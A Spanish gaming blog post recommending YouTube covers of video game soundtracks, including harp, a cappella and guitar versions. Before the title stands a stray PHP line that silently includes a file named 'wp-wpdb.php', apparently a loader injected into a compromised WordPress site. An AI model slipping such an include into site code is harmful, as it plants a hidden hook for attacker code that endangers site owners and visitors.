if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); COVERS DE VIDEOJUEGOS! ESAS GRANDES BANDAS SONORAS LO VALEN! (VI) – La Fortaleza de LeChuck

COVERS DE VIDEOJUEGOS! ESAS GRANDES BANDAS SONORAS LO VALEN! (VI)

Me gusta pasarme de vez en cuando por Youtube, y por las recopilaciones que ya he hecho de covers de videojuegos, y escucharlas a todo volumen a solas en mi habitación. Es muy relajante, y espero que vosotros también practiquéis ese sano ejercicio. Aunque me repito a veces con las sagas y melodías, cada artista tiene su propia forma de reproducir cada canción, y eso es algo que me fascina. Hoy os traigo formas distintas de hacer covers de videojuegos.

¡El arpa! ¡Que maravilloso instrumento! Así es, si lo combinamos con melodías de Zelda o Bioshock Infinite, así queda. Luego pasaos por su canal, porque tiene muchísimas covers y todas quedan muy auténticas.

Este hombre está haciendo temblar el mundo de las covers de videojuegos en Youtube, su nombre es SmoothMcGroove, y solo haciéndose servir de sus cuerdas vocales y algunos chasquidos de dedos, nos hace disfrutar de covers únicas. ¡Se atreve con todo! Desde el mítico «Cornered» de Phoenix Wright a Super Metroid, pasando por el Guile’s Theme de Street Fighter, el Bloody Tears de Castlevania, Megaman y todo lo que le echen. Un fiera ¿No me digas que no eres fan?.

Pero espera, una guitarra no puede faltar, es el instrumento de las covers, el más usado, y os dejo con esta mastodóntica cover de «Leaving Earth» de Mass Effect 3… ¡oooooh!

¡Bueno! Creo que por hoy, con estos dos descubrimientos, ya he cumplido, ahora os toca a vosotros, si sabéis de algún autor que valga la pena y no haya pasado todavía por «Covers de videojuegos» ¡Ya estáis tardando en soltar el enlace!

Publicada el
Categorizado como Retro

Por Museboy

Como la mayoría de vosotros, crecí jugando a videojuegos y ahora intento transmitir toda la pasión por este mundo en La Fortaleza de LeChuck. También busco ofertas de videojuegos. Seguidme en Twitter y sabréis de qué hablo.

1 comentario

Dejar un comentario